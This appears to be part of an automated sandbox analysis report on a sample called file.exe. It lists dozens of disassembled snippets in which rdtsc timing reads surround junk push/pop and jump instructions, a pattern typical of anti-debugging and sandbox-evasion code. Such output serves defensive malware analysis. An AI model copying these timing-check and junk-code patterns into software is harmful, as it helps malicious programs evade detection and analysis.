              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C767 second address: 90C76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C76B second address: 90C76F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B432B second address: 8B4331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4331 second address: 8B4336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C82A second address: 90C834 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE52CC9523Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD7E5 second address: 8AD810 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE52CBFFE16h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE52CBFFE29h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD810 second address: 8AD82C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95245h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913A37 second address: 913A5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FE52CBFFE1Eh 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B604 second address: 91B621 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE52CC95236h 0x00000008 jmp 00007FE52CC9523Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FE52CC95242h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B621 second address: 91B631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE52CBFFE16h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91AF17 second address: 91AF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B20F second address: 91B242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FE52CBFFE21h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92066E second address: 9206A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FE52CC9523Eh 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 js 00007FE52CC95238h 0x00000019 je 00007FE52CC95238h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92084D second address: 9208C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE52CBFFE1Fh 0x00000008 je 00007FE52CBFFE16h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FE52CBFFE27h 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d jmp 00007FE52CBFFE21h 0x00000022 jmp 00007FE52CBFFE27h 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FE52CBFFE1Bh 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9208C0 second address: 9208CA instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE52CC9523Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924E1D second address: 924E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925088 second address: 92508C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92508C second address: 925096 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE52CBFFE16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9251B2 second address: 9251B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9251B8 second address: 9251E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FE52CBFFE22h 0x0000000f js 00007FE52CBFFE16h 0x00000015 jnc 00007FE52CBFFE16h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92534E second address: 92535B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007FE52CC9523Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92535B second address: 92535F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92535F second address: 925365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925744 second address: 92577F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FE52CBFFE1Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE52CBFFE28h 0x00000013 jmp 00007FE52CBFFE1Dh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92590C second address: 925910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925910 second address: 925927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FE52CBFFE1Fh 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925927 second address: 925940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE52CC95243h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925940 second address: 92596B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007FE52CBFFE2Bh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92596B second address: 925973 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925973 second address: 92597B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92A14F second address: 92A154 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92A154 second address: 92A178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CBFFE1Ah 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE52CBFFE1Dh 0x00000011 ja 00007FE52CBFFE16h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 928FB5 second address: 928FD9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE52CC95236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE52CC95247h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F5EBB second address: 8D380E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE52CBFFE27h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FE52CBFFE1Ch 0x00000011 nop 0x00000012 call dword ptr [ebp+122D2587h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b jc 00007FE52CBFFE16h 0x00000021 pop eax 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 popad 0x00000027 jmp 00007FE52CBFFE20h 0x0000002c popad 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F5FB6 second address: 8F6085 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE52CC9524Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FE52CC95238h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ecx, 2291FF96h 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov edx, dword ptr [ebp+122D3972h] 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007FE52CC95238h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 00000014h 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 add edi, dword ptr [ebp+122D3A2Eh] 0x0000005e mov dword ptr [ebp+12489C61h], esp 0x00000064 jmp 00007FE52CC9523Eh 0x00000069 cld 0x0000006a cmp dword ptr [ebp+122D3A5Ah], 00000000h 0x00000071 jne 00007FE52CC952E9h 0x00000077 sub dword ptr [ebp+1247A522h], eax 0x0000007d sub edx, dword ptr [ebp+122D3AEAh] 0x00000083 mov byte ptr [ebp+122D2E42h], 00000047h 0x0000008a mov di, CBF8h 0x0000008e mov edx, dword ptr [ebp+122D2723h] 0x00000094 mov eax, D49AA7D2h 0x00000099 add ecx, dword ptr [ebp+12451682h] 0x0000009f push eax 0x000000a0 push eax 0x000000a1 push edx 0x000000a2 jg 00007FE52CC95238h 0x000000a8 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F63C3 second address: 8F63C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F63C7 second address: 8F63D8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 je 00007FE52CC9523Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F65AB second address: 8F65B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F661E second address: 8F662C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE52CC9523Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F662C second address: 8F6630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6630 second address: 8F6686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE52CC95247h 0x0000000e xchg eax, esi 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FE52CC95238h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 nop 0x0000002a pushad 0x0000002b push esi 0x0000002c pushad 0x0000002d popad 0x0000002e pop esi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FE52CC95241h 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6686 second address: 8F6698 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE52CBFFE16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6698 second address: 8F66A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC9523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6789 second address: 8F678E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6D62 second address: 8F6D66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6D66 second address: 8F6D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FE52CBFFE1Ch 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE52CBFFE1Eh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6ECA second address: 8F6ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7094 second address: 8F709C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F709C second address: 8F70A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F70A2 second address: 8F70AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F70AF second address: 8F70B9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE52CC95236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F70B9 second address: 8F70D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F71DF second address: 8F71E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9293E7 second address: 9293EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9293EF second address: 92940A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FE52CC95236h 0x00000009 jmp 00007FE52CC95240h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92940A second address: 929434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FE52CBFFE28h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007FE52CBFFE24h 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929434 second address: 92943A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929597 second address: 9295AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CBFFE22h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9295AF second address: 9295B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9295B8 second address: 9295D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9295D6 second address: 9295EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE52CC9523Eh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92973F second address: 92975E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE52CBFFE25h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92975E second address: 929762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9298C0 second address: 9298C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9298C4 second address: 9298FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95247h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FE52CC9524Fh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929A5C second address: 929A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929BB5 second address: 929BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929BBE second address: 929BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929D00 second address: 929D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FE52CC95236h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 929D0E second address: 929D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FC04 second address: 92FC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CC95247h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FC1F second address: 92FC3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jns 00007FE52CBFFE16h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ecx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E80E second address: 92E829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE52CC95244h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E992 second address: 92E997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F217 second address: 92F229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007FE52CC95236h 0x0000000c je 00007FE52CC95236h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F229 second address: 92F244 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE52CBFFE16h 0x00000008 jmp 00007FE52CBFFE1Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F244 second address: 92F253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC9523Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F4D1 second address: 92F4D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F4D5 second address: 92F4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F4DB second address: 92F4E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FE52CBFFE16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F4E6 second address: 92F514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CC9523Dh 0x00000009 jmp 00007FE52CC9523Eh 0x0000000e popad 0x0000000f jnl 00007FE52CC95238h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push esi 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F634 second address: 92F638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F638 second address: 92F63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FA63 second address: 92FA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FA69 second address: 92FA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CC95246h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FA84 second address: 92FA89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FA89 second address: 92FABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CC95240h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c js 00007FE52CC9523Ah 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE52CC9523Fh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FABD second address: 92FAC7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE52CBFFE1Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93507C second address: 93509E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE52CC95236h 0x00000008 jo 00007FE52CC95236h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FE52CC95242h 0x00000015 rdtsc
